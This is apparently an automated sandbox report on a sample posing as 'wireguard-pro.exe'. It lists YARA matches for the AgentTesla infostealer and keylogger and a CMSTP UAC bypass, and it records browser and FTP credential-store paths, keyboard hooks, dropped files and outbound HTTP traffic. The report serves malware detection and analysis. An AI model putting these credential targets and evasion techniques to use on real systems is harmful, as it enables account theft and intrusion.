0.2.wireguard-pro.exe.12d528f0.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e51:$s10: logins 0x28f3b:$s10: logins 0x293e9:$s10: logins 0x295e9:$s10: logins 0x2c6bf:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0xc618:$string1: smtp 0xdd58:$string1: smtp 0xbc02:$string2: appdata 0xbcf6:$string3: 76487-337-8429955-22614 0xbc42:$string4: yyyy-MM-dd HH:mm:ss 0xbbe4:$string6: webpanel 0xc7c1:$string7: <br>UserName      : 0xcd75:$string8: <br>IP Address  :
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x107bf:$f1: FileZilla\recentservers.xml 0x108cb:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0xfc83:$b1: Chrome\User Data\ 0xfcfb:$b4: Opera Software\Opera Stable\Login Data 0xfd63:$b5: YandexBrowser\User Data\ 0x2a74:$s4: logins.json 0xfdd7:$s4: logins.json 0x1135d:$s5: Account.CFN 0x11a95:$s6: wand.dat 0xfc37:$a1: username_value 0xfc55:$a2: password_value 0x2ac8:$a3: encryptedUsername 0xfe2b:$a3: encryptedUsername 0x104a5:$a3: encryptedUsername 0x2aa4:$a4: encryptedPassword 0xfe07:$a4: encryptedPassword 0x104c9:$a4: encryptedPassword
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x9a54:$s1: get_kbHook 0xad8d:$s2: GetPrivateProfileString 0x8c90:$s3: get_OSFullName 0x9d08:$s4: get_PasswordHash 0x9477:$s6: FtpWebRequest 0x2a74:$s7: logins 0xfced:$s7: logins 0xfdd7:$s7: logins 0x10285:$s7: logins 0x10485:$s7: logins 0x1355b:$s7: logins 0xccf7:$s8: keylog
3.0.HQL82NEF.exe.b3af64.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2a74:$s10: logins 0xfced:$s10: logins 0xfdd7:$s10: logins 0x10285:$s10: logins 0x10485:$s10: logins 0x1355b:$s10: logins 0x9a25:$g1: get_Clipboard 0x9bcc:$g2: get_Keyboard 0x1e61:$g3: get_Password 0x9d19:$g3: get_Password 0x9bf1:$g4: get_CtrlKeyDown 0x9c13:$g5: get_ShiftKeyDown 0x9be2:$g6: get_AltKeyDown
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x108f4:$string1: smtp 0x12034:$string1: smtp 0xfede:$string2: appdata 0xffd2:$string3: 76487-337-8429955-22614 0xff1e:$string4: yyyy-MM-dd HH:mm:ss 0xfec0:$string6: webpanel 0x10a9d:$string7: <br>UserName      : 0x11051:$string8: <br>IP Address  :
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x14a9b:$f1: FileZilla\recentservers.xml 0x14ba7:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x13f5f:$b1: Chrome\User Data\ 0x32a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3584:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x13fd7:$b4: Opera Software\Opera Stable\Login Data 0x1403f:$b5: YandexBrowser\User Data\ 0x6d50:$s4: logins.json 0x140b3:$s4: logins.json 0x15639:$s5: Account.CFN 0x15d71:$s6: wand.dat 0x13f13:$a1: username_value 0x13f31:$a2: password_value 0x6da4:$a3: encryptedUsername 0x14107:$a3: encryptedUsername 0x14781:$a3: encryptedUsername 0x6d80:$a4: encryptedPassword 0x140e3:$a4: encryptedPassword 0x147a5:$a4: encryptedPassword
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0xdd30:$s1: get_kbHook 0xf069:$s2: GetPrivateProfileString 0xcf6c:$s3: get_OSFullName 0xdfe4:$s4: get_PasswordHash 0xd753:$s6: FtpWebRequest 0x6d50:$s7: logins 0x13fc9:$s7: logins 0x140b3:$s7: logins 0x14561:$s7: logins 0x14761:$s7: logins 0x17837:$s7: logins 0x10fd3:$s8: keylog
3.0.HQL82NEF.exe.b36c88.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6d50:$s10: logins 0x13fc9:$s10: logins 0x140b3:$s10: logins 0x14561:$s10: logins 0x14761:$s10: logins 0x17837:$s10: logins 0xdd01:$g1: get_Clipboard 0xdea8:$g2: get_Keyboard 0x26bc:$g3: get_Password 0x613d:$g3: get_Password 0xdff5:$g3: get_Password 0xdecd:$g4: get_CtrlKeyDown 0xdeef:$g5: get_ShiftKeyDown 0xdebe:$g6: get_AltKeyDown
0.2.wireguard-pro.exe.12d528f0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.wireguard-pro.exe.12d528f0.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.wireguard-pro.exe.12d528f0.2.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x2397c:$string1: smtp 0x250bc:$string1: smtp 0x22f66:$string2: appdata 0x2305a:$string3: 76487-337-8429955-22614 0x22fa6:$string4: yyyy-MM-dd HH:mm:ss 0x22f48:$string6: webpanel 0x23b25:$string7: <br>UserName      : 0x240d9:$string8: <br>IP Address  :
0.2.wireguard-pro.exe.12d528f0.2.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x27b23:$f1: FileZilla\recentservers.xml 0x27c2f:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x26fe7:$b1: Chrome\User Data\ 0x16330:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1660c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x2705f:$b4: Opera Software\Opera Stable\Login Data 0x270c7:$b5: YandexBrowser\User Data\ 0x19dd8:$s4: logins.json 0x2713b:$s4: logins.json 0x286c1:$s5: Account.CFN 0x28df9:$s6: wand.dat 0x26f9b:$a1: username_value 0x26fb9:$a2: password_value 0x19e2c:$a3: encryptedUsername 0x2718f:$a3: encryptedUsername 0x27809:$a3: encryptedUsername 0x19e08:$a4: encryptedPassword 0x2716b:$a4: encryptedPassword 0x2782d:$a4: encryptedPassword
0.2.wireguard-pro.exe.12d528f0.2.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x20db8:$s1: get_kbHook 0x220f1:$s2: GetPrivateProfileString 0x1fff4:$s3: get_OSFullName 0x2106c:$s4: get_PasswordHash 0x207db:$s6: FtpWebRequest 0x19dd8:$s7: logins 0x27051:$s7: logins 0x2713b:$s7: logins 0x275e9:$s7: logins 0x277e9:$s7: logins 0x2a8bf:$s7: logins 0x2405b:$s8: keylog
0.2.wireguard-pro.exe.12d528f0.2.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x19dd8:$s10: logins 0x27051:$s10: logins 0x2713b:$s10: logins 0x275e9:$s10: logins 0x277e9:$s10: logins 0x2a8bf:$s10: logins 0x20d89:$g1: get_Clipboard 0x20f30:$g2: get_Keyboard 0x15744:$g3: get_Password 0x191c5:$g3: get_Password 0x2107d:$g3: get_Password 0x20f55:$g4: get_CtrlKeyDown 0x20f77:$g5: get_ShiftKeyDown 0x20f46:$g6: get_AltKeyDown
9.0.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.0.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
7.0.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.0.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
10.2.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
7.2.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.2.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
10.0.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.0.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
8.0.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.0.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
9.2.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
8.2.wireguard.exe.850000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.wireguard.exe.850000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x339057:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x33db63:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x3e5f06:$s1: CoGetObject
Click to see the 57 entries

HTTP traffic detected: POST /wp-cron.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: rakishev.netContent-Length: 280Expect: 100-continueConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 136.144.57.121:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 136.144.57.121:443 -> 192.168.2.4:49779 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Detected Agent Tesla keylogger

Source: HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp	Memory string: get_Clipboard
Source: HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp	Memory string: set_Sendwebcam
Source: HQL82NEF.exe, 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp	Memory string: get_ComputerName
Source: audddd.exe, 00000012.00000002.1132147750.0000000005850000.00000004.08000000.00040000.00000000.sdmp	Memory string: get_Username

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\audddd\audddd.exe

Contains functionality to capture screen (.Net source)

Source: HQL82NEF.exe.0.dr, JA.cs	.Net Code: WSX
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, JA.cs	.Net Code: WSX
Source: audddd.exe.3.dr, JA.cs	.Net Code: WSX

Source: HQL82NEF.exe, 00000003.00000002.1129347191.0000000000F58000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

memstr_bfc32c6d-3

Source: wireguard.exe, 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp

Binary or memory string: &Configuration:,M3.2.0,M11.1.0/managerservice476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAbout WireGuardAddDllDirectoryAddresses: NoneCLSIDFromStringCallWindowProcWCreateHardLinkWCreatePopupMenuCreateWindowExWDeviceIoControlDialogBoxParamWDragAcceptFilesDrawThemeTextExDuplicateHandleExcludeClipRectFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileFwpmEngineOpen0FwpmFreeMemory0GdiplusShutdownGetActiveWindowGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetDpiForWindowGetEnhMetaFileWGetModuleHandleGetMonitorInfoWGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTextMetricsWGetThreadLocaleHanifi_RohingyaImpersonateSelfInsertMenuItemWInvalid key: %vIsWindowEnabledIsWindowVisibleIsWow64Process2NTSTATUS 0x%08xNotTrueTypeFontOleUninitializeOpenThreadTokenOther_LowercaseOther_UppercasePlayEnhMetaFilePostQuitMessageProcess32FirstWProfileNotFoundPsalter_PahlaviPublicKey = %s

memstr_02c45b94-f

Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_86AB612B21DEDF3B8CD155ED2E4114FF	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A9B13BCD41ACB49316A37129BE941FFA_BD22E51CB23A085126973E3A7E539978	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\026A86A161D256DBB33076EDF20C0E5E_8372263305412A8ACAD18CE348CFB7C8	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A37B8BA80004D3266CB4D93B2052DC10_EBDB5A7037F08CDFB408DBFC0D44B43D	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AF360AACB1570042DEFBC833317997D0_6D40F27EBCB4D57A7D8447DAAC4FFE30	Jump to dropped file

System Summary

Yara detected AgentTesla

Source: Yara match	File source: Process Memory Space: wireguard-pro.exe PID: 7080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HQL82NEF.exe PID: 5160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: audddd.exe PID: 7812, type: MEMORYSTR
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED

Malicious sample detected (through community Yara rule)

Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d6ba54.3.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d67778.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b20000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b3af64.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.0.HQL82NEF.exe.b36c88.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: AgentTesla Payload Author: kevoreilly
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 0.2.wireguard-pro.exe.12d528f0.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 10.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.0.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 9.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.wireguard.exe.850000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: wireguard-pro.exe PID: 7080, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: HQL82NEF.exe PID: 5160, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: Process Memory Space: audddd.exe PID: 7812, type: MEMORYSTR	Matched rule: agenttesla_smtp_variant Author: j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: AgentTesla Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: AgentTesla Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, type: DROPPED	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Program Files\WireGuard\wireguard.exe, type: DROPPED	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

.NET source code contains very large strings

Source: wireguard-pro.exe, Program.cs

Long String: Length: 366338

Source: C:\Users\user\Desktop\wireguard-pro.exe	Code function: 0_2_00007FF7AE7205B8	0_2_00007FF7AE7205B8
Source: C:\Users\user\Desktop\wireguard-pro.exe	Code function: 0_2_00007FF7AE7204C8	0_2_00007FF7AE7204C8
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_00308A03	2_2_00308A03
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_0030296C	2_2_0030296C
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_00304C74	2_2_00304C74
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_0030328A	2_2_0030328A
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_00303CE1	2_2_00303CE1
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_00304DBD	2_2_00304DBD
Source: C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe	Code function: 2_2_00307B81	2_2_00307B81
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013D8900	3_2_013D8900
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013DEB37	3_2_013DEB37
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013D7CE8	3_2_013D7CE8
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013D8030	3_2_013D8030
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013D5370	3_2_013D5370
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013DDDE0	3_2_013DDDE0
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_013DDE08	3_2_013DDE08
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_0678A238	3_2_0678A238
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_0678BFE0	3_2_0678BFE0
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06783BE0	3_2_06783BE0
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_0678B900	3_2_0678B900
Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe	Code function: 3_2_06784031	3_2_06784031
